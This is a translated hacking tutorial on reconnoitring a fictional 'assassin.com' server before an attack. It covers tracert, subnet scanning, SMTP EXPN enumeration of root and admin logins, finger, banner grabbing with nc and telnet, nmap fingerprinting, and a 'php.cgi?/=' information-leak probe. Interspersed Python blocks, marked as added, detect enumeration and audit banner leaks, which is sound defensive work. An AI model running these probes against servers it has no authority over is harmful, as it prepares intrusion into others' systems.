Identify a target: To fight an enemy, you must know it. The same goes for a hack: we will have to gather a certain amount of information (as much as possible, in fact) on the machine the hacker is after, which we will call the "target". There are a lot of tools for this. Not all of them apply to every machine, because security levels differ, and some will be ineffective. I have already covered many of these tools in other sections of this site, so I will not go over those again; I will just mention them and give a link to the article. But don't worry, I give enough information for you to understand and start experimenting a bit. There is no question here of lame hacks with BO (Back Orifice) or other trojans and the like; here we are talking about hacking servers, not grandma's PC running Win9x. The real risks for you start here, but as I imagine you are aware of that, let's begin. In this article I will not give the exact address of a server as I did for the ftp hack, because that would amount to inciting abuse. So the server will belong to a company called "assassin" and its DNS name (domain name service) will be http://www.assassin.com/. All the manipulations I explain in this article are done under Windows, but they work just as well (better, did I hear from the back of the room?) under Linux; only the commands differ, and I will not explain those here. Let me come back briefly to the differences between IP addresses, DNS names and URLs. Every server has an IP address (yes, because by definition a server is a computer connected to a network that other computers can see), except when it is not connected. For the precise definition of an IP address I refer you to the article I wrote above. A DNS address is an address like http://www.... I write "www...." because it depends: there are DNS addresses that do not start with www but with something like http://perso.infonie.fr or ww2 or www3 ... It is true that www.assassin.com is easier to remember than 167.34.217.65.
For a DNS address, the company that owns the server has to pay a sum of between 500 and 1,000 francs to an organization responsible for assigning these addresses and making sure that two different servers do not use the same one. Finally, a URL is both of the things mentioned above. We speak of a URL to tell someone that it is the address of a server reached through port 80 (the port used for www, web pages that is) that we are talking about, not an e-mail address. So when you ask for the URL of a site you generally get the DNS address, but you may just as well be given the IP; it changes nothing for you, because of course if you type the IP of a server or its DNS address into Netscape you will end up on the same pages. Provided, of course, that this server actually hosts a website. Now that this is clear, let's return to the heart of the matter. With a DNS address alone we cannot do anything; we need the server's IP address, and for that we are going to ping it. To do so you type at the DOS prompt: ping -a www.assassin.com and it will give you its IP :-) plus the quality and the speed of the connection, which we do not care about much, I must say. Now let's see which machines sit between us and the assassin server. There are several methods for that. Either you use a program of the Visual Route kind (paid, last I heard) or NeoTrace or others, or you use a DOS command called tracert. The programs I cannot explain; they are super simple and have the advantage of being graphical, but for those who prefer text lines, the DOS option is for you. Besides, I will explain it quickly, and even if you are a fan of programs I guess you have nothing against a bit of general culture. At the DOS prompt you type: tracert url_du_serveur, for example: tracert 167.34.217.65 or tracert www.assassin.com (both work). If it says "host unreachable", either you copied the IP you found earlier (or the URL) wrong, or the server is no longer connected. Every machine lying between you and the target server will display its IP.
Note them down somewhere or take a screen capture (print screen). The last IP shown will be that of the target. And if the one just before the target's has the same first three numbers as your target, then the target you are trying to attack is most likely secured. That will be fun. In plain language for the neophyte, this means there is a machine located on the LAN (by LAN I mean the line between the internal network and the external network) between the target machine and the Internet, which ensures its protection. That is to say, the system administrator has invested in a machine (there may even be several) that serves only for security and nothing else. It is either a firewall, or a filtering router, or a bastion, or a bunker, or a proxy, or I don't know what other stuff like that :-). If no such machine shows up on the LAN when you run the tracert, that does not mean a similar protection is not built into the assassin server itself (this is almost always the case, for that matter), but generally it is a fairly reliable indicator of the security level of a network. If you read the article about IP you know that the first three numbers of an IP correspond to a domain and the last number corresponds to a machine on that network. In this example the domain is 167.34.217, since the assassin server's IP is 167.34.217.65, and the machine is "station" number 65. In the vast majority of cases (I would almost say all) there are several machines in the same domain, and each must have a "station" number between 0 and 255. Of course there are domains that have more than 256 servers connected to each other, and in that case they either have several domains connected to the Internet (as in the case of AOL, which has hundreds beginning with 162, 171, 172, ...) or have sub-networks inside domains that are not connected directly to the Internet; these can use IPs already used by other servers on the Internet, but since they have no direct connection to the Internet, no problem arises.
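As an added example (my own code, not part of the original article), here is a small Python script that parses a constructed Windows tracert output and applies the rule of thumb above: the last hop is the target, and a penultimate hop inside the target's own /24 suggests a dedicated filtering device in front of it. An administrator can feed a trace to one of their own servers into it to see what the path gives away about the perimeter. The sample trace, the hop addresses and the function names are all constructed for this example.

```python
import ipaddress
import re

# Constructed sample of Windows "tracert" output (not a real trace); the last
# hops use the article's fictional assassin network, 167.34.217.0/24, and the
# earlier hops use private / documentation ranges.
SAMPLE_TRACERT = """\
Tracing route to www.assassin.com [167.34.217.65]
over a maximum of 30 hops:

  1     1 ms     1 ms     1 ms  192.168.1.1
  2    12 ms    11 ms    12 ms  10.20.0.1
  3    25 ms    24 ms    26 ms  198.51.100.9
  4     *        *        *     Request timed out.
  5    30 ms    31 ms    30 ms  167.34.217.1
  6    31 ms    30 ms    32 ms  167.34.217.65

Trace complete.
"""

# A hop line ends with the responding router's IP; timed-out hops carry none.
HOP_RE = re.compile(r"^\s*(\d+)\s+.*?\s(\d{1,3}(?:\.\d{1,3}){3})\s*$")


def parse_hops(text):
    """Return [(hop_number, ip), ...] for every hop that answered."""
    hops = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if m:
            hops.append((int(m.group(1)), m.group(2)))
    return hops


def perimeter_device_likely(hops, target_ip):
    """The article's rule of thumb: the last hop is the target; if the hop
    just before it shares the target's first three octets (same /24), a
    dedicated filtering device on the target's own network is likely.
    Returns None when the trace did not end at the target."""
    if len(hops) < 2 or hops[-1][1] != target_ip:
        return None
    target_net = ipaddress.ip_network(f"{target_ip}/24", strict=False)
    return ipaddress.ip_address(hops[-2][1]) in target_net


def summarize(text, target_ip):
    """Convenience wrapper: the answered hops plus the verdict."""
    hops = parse_hops(text)
    return {"hops": hops, "perimeter_device": perimeter_device_likely(hops, target_ip)}


if __name__ == "__main__":
    print(summarize(SAMPLE_TRACERT, "167.34.217.65"))
```

The verdict is only the heuristic the article describes: a filtering router that does not decrement TTL or answer ICMP will not show up as a hop at all, which is exactly the case the text warns about when it says protection may be built into the server itself.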
And if such sub-networks want to connect to the Internet anyway, they connect through a proxy and therefore take the proxy's IP to get their answers back from the Internet or the external network. A proxy is a kind of firewall that relays requests between an internal network and an external network but allows no direct contact between two machines (yeah, security), and if there were direct contact, the machine on the subnet would create an IP conflict, since it would be using somebody else's IP. Complicated? This will be explained in detail in the article about firewalls. Doesn't the fact that going through a proxy changes your IP remind you of something? Yes, spoofing! Ah, life is beautiful, but here it is not us doing it. So put that out of your mind or you will confuse yourself later. For the moment your IP is not spoofed, but that will come. :-) So I said that the assassin server must be connected to other machines of the network, and to find out there are several ways:
- The first is to take a program called an IP scanner and enter the assassin server's IP. It will look for all servers with an IP between 167.34.217.0 and 167.34.217.255, since the target's IP is 167.34.217.65. The program will (hopefully) spit out IPs, which you will note down carefully.
- The second is to use an existing goldmine of information on most of the world's servers connected to the Internet, available to everyone. All servers with a DNS address (and maybe others too, I don't know) have a number of pieces of information recorded, such as the number of machines that have access to the server, the size (number of IPs or machines) of their domain ... This information is available through telnet, which means you will have to start telnet. Several servers provide this kind of information, including Internic (whois.internic.net) and Netcraft (www.netcraft.com), but we will come back to this in detail in another article, because the possibilities of this research are quite mind-blowing. For now, just know that it exists.
- The third is to do an SMTP EXPN on a machine of the network. If it returns an e-mail address on a different server but in the same domain, you are set. I remind you that the SMTP port is 25. You connect to it, under Windows or Linux, and type: HELO name_of_the_server; then, once you have been greeted in return, you type EXPN ROOT. Of course the ROOT login needs to exist, because the root user does not always have the login root, far from it. The root login may even be only a user account. Always try EXPN ROOT first, and if that gives "Unknown login", try the other commonly used logins such as sysop, root, admin, ... and if that yields nothing and the server you are attacking has a web page, you can look for information on the different e-mail addresses on that site. Of course EXPN does not only work for root but for any user.
- The fourth is to do an nslookup on a server, but it only works on Linux. To do it: nslookup www.assassin.com (in console mode, of course).
- The fifth is to do a dig, also in Linux console mode: dig www.assassin.com
- The last way is to use specific ports such as finger (79) and whois (43), which, when they are not closed or unusable from a foreign machine, are very informative for knowing which machines and users are connected to this machine, along with their IPs and their rights. To find out which ports are open (ftp, telnet, finger ...) use a port scanner.
Of course, for a server to know who is allowed in, it has criteria that it verifies, such as login, password, IP, source port, packet protocol, ... With the information we have just collected it will be possible to use methods to falsify these criteria and circumvent security. But that's for another article ... Now we will try to find out what OS is running on a server. It will help us enormously in knowing which hack method to use. For that there are also several methods; unfortunately most of the ones I know go through Linux.
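Going back to the SMTP EXPN method above, here is the other side of it, as an added example that is not part of the original article: a Python detector (my own code) that reads a constructed SMTP command log and flags clients that run EXPN/VRFY against several names, or against the well-known administrative logins the text lists (root, sysop, admin). The log format, the client addresses and the function names are all constructed for this example; real MTAs log differently and would need their own parser.

```python
import re
from collections import defaultdict

# Constructed SMTP command log in a format of my own (not any real MTA's):
# "<time> client=<ip> cmd=<verb> arg=<argument> code=<reply code>".
SAMPLE_LOG = """\
12:00:01 client=203.0.113.7 cmd=HELO arg=scanner.example code=250
12:00:02 client=203.0.113.7 cmd=EXPN arg=ROOT code=550
12:00:03 client=203.0.113.7 cmd=EXPN arg=sysop code=550
12:00:04 client=203.0.113.7 cmd=EXPN arg=admin code=550
12:00:05 client=203.0.113.7 cmd=VRFY arg=postmaster code=252
12:00:20 client=198.51.100.4 cmd=HELO arg=mail.partner.example code=250
12:00:21 client=198.51.100.4 cmd=MAIL arg=<alice@partner.example> code=250
12:00:22 client=198.51.100.4 cmd=RCPT arg=<bob@assassin.com> code=250
12:00:30 client=192.0.2.9 cmd=EXPN arg=staff code=550
"""

LINE_RE = re.compile(r"^(\S+) client=(\S+) cmd=(\S+) arg=(\S+) code=(\d{3})$")
PROBE_VERBS = {"EXPN", "VRFY"}
# The logins the article says get tried first when "root" is unknown.
WELL_KNOWN_LOGINS = {"root", "sysop", "admin"}


def parse_log(text):
    """Parse the constructed log into dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            time, client, verb, arg, code = m.groups()
            events.append({"time": time, "client": client, "verb": verb.upper(),
                           "arg": arg, "code": int(code)})
    return events


def find_enumeration(events, threshold=3):
    """Flag clients that issue at least `threshold` EXPN/VRFY commands, or
    that probe one of the well-known administrative logins at all.
    Returns {client_ip: {"probes": count, "targets": [names...]}}."""
    probes = defaultdict(list)
    for ev in events:
        if ev["verb"] in PROBE_VERBS:
            probes[ev["client"]].append(ev["arg"])
    alerts = {}
    for client, args in probes.items():
        hits_known = any(a.lower() in WELL_KNOWN_LOGINS for a in args)
        if len(args) >= threshold or hits_known:
            alerts[client] = {"probes": len(args), "targets": sorted(set(args))}
    return alerts


if __name__ == "__main__":
    for client, info in find_enumeration(parse_log(SAMPLE_LOG)).items():
        print(f"{client}: {info['probes']} EXPN/VRFY probes -> {info['targets']}")
```

The single EXPN of "staff" from 192.0.2.9 stays below the threshold and is not reported, which is the trade-off of any count-based rule. The cleaner fix is not to answer these commands from the outside at all: Sendmail takes noexpn,novrfy in its PrivacyOptions, and Postfix has disable_vrfy_command = yes (it never implements EXPN).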
I will not go so far as to say Linux or die, but unless you are a Windows expert (a real one), there are plenty of things you cannot do without a specific program, and such programs (I am talking here about hacker programs of the SATAN, nmap, ... kind) are very rare under Windows. You are even obliged to port the Linux program to Windows yourself, or to write your own application, for Windows to start looking like something usable. There are many ways to find out which OS a server is running. Here are several:
- The first is ftp. We do as in the ftp hack, and on connecting to the ftp server we see a line it sends us giving the type of OS it uses. This is not an exact science, because nothing prevents a server from removing this line or replacing it with a false one or an advertising banner (for security or commercial reasons :-( ). So if you are on Windows it stops there, but if you are on Linux you simply type SYST to get more information on the server's OS.
- The second goes under Linux; it consists of doing:
playground~> telnet hpux.u-aizu.ac.jp
Trying 163.143.103.12 ...
Connected to hpux.u-aizu.ac.jp.
Escape character is '^]'.
HP-UX B.10.01 hpux A 9000/715 (ttyp2)
login:
(from the American mag Phrack). You can see the version of the server's OS (5th line, for those who have not spotted it).
- The third method also goes under Linux:
playground~> echo 'GET / HTTP/1.0\n' | nc hotbot.com 80 | egrep '^Server:'
Server: Microsoft-IIS/4.0
playground~>
(still taken from the same zine)
- Finally, the last and best method, which again goes through Linux, consists of using the TCP packets sent by a server to find out which server they come from. Indeed, most servers have their own management of the TCP packet layer, different from one server to the next, so that by knowing all the versions of all the OSes in the world well, and by incorporating their particularities for TCP, UDP and sometimes even ICMP packets, the program can say almost with certainty which OS a server is running. Indeed, when a packet is sent, whatever the protocol (tcp or udp;
ICMP being a case apart because it is only used for errors or for redirects caused by packets with incorrect headers), the server slightly alters the packet header, without touching the TCP payload that is useful to normal users. This alteration is stored and analyzed. Each OS alters it differently, so the type and version are immediately detected. This program is called nmap and is available at the following address: http://www.insecure.org/nmap
Something that can also be useful is to put a "=" after a cgi-bin: if the server has the flaw, it will give you the version of the OS kernel, the scripts ... but generally we need this kind of information before being logged on the machine, and you will only get it if you have read access through HTTP via the cgi-bin. For example, if a server named assassin has buggy php cgi scripts, you would just do: www.assassin.com/cgi-bin/php.cgi?/=
Of course all the previous steps are not necessary; rather, it is rare for all of them to be required. But when you cannot get into a server directly, you try to get in through a less secure one that it trusts, and that is what knowing who it communicates with is for.
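The three banner methods above (ftp greeting, telnet login banner, HTTP Server: header) all rely on the server volunteering a product and version. As an added example that is not part of the original article, here is a Python audit script (my own code) that an administrator can point at banners captured from their own services to see which ones still leak a version string, which is the mitigation the text itself mentions: remove the line or replace it with something neutral. The FTP greeting, the HTTP responses and the function names are constructed for this example; the HP-UX line is the article's own Phrack excerpt.

```python
import re

# Constructed banners of the three kinds the article reads. The FTP greeting
# and HTTP responses are made up for this example; the telnet line is the
# article's own HP-UX excerpt.
SAMPLE_FTP_BANNER = "220 ProFTPD 1.2.0pre3 Server (assassin FTP) [www.assassin.com]"
SAMPLE_TELNET_BANNER = "HP-UX hpux B.10.01 A 9000/715 (ttyp2)"
SAMPLE_HTTP_RESPONSE = (
    "HTTP/1.0 200 OK\r\n"
    "Server: Microsoft-IIS/4.0\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>hello</body></html>"
)
# The same server with its Server: header reduced to a neutral name.
HARDENED_HTTP_RESPONSE = "HTTP/1.0 200 OK\r\nServer: webserver\r\n\r\n"

# A product name followed by "/" or a space and something version-like
# ("1.2.0pre3", "4.0", "B.10.01").
VERSION_RE = re.compile(
    r"(?P<product>[A-Za-z][A-Za-z0-9_-]*)[/ ]+"
    r"(?P<version>[A-Za-z]?\.?\d+(?:\.\d+)+[A-Za-z0-9]*)"
)


def server_header(response):
    """Pull the Server: header value out of a raw HTTP response, like the
    egrep '^Server:' in the article; None when the header is absent."""
    head = response.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n"):
        if line.lower().startswith("server:"):
            return line.split(":", 1)[1].strip()
    return None


def version_hints(banner):
    """Return the (product, version) pairs a banner gives away."""
    if banner is None:
        return []
    return [(m.group("product"), m.group("version"))
            for m in VERSION_RE.finditer(banner)]


def audit(banners):
    """banners: {service: banner_text}. Returns only the services whose
    banner leaks a product/version pair, with what they leak."""
    report = {}
    for service, banner in banners.items():
        hints = version_hints(banner)
        if hints:
            report[service] = hints
    return report


if __name__ == "__main__":
    print(audit({
        "ftp": SAMPLE_FTP_BANNER,
        "telnet": SAMPLE_TELNET_BANNER,
        "http": server_header(SAMPLE_HTTP_RESPONSE),
        "http-hardened": server_header(HARDENED_HTTP_RESPONSE),
    }))
```

Only the first three services show up in the report; the hardened response is silent because "webserver" carries no version. Note that on the HP-UX line the regex attributes the version to the hostname "hpux" rather than to "HP-UX", which is fine for an audit: what matters is that B.10.01 is exposed at all. Stripping banners does nothing against the nmap-style TCP/IP stack fingerprinting the text describes last, which is why that method is called the best one.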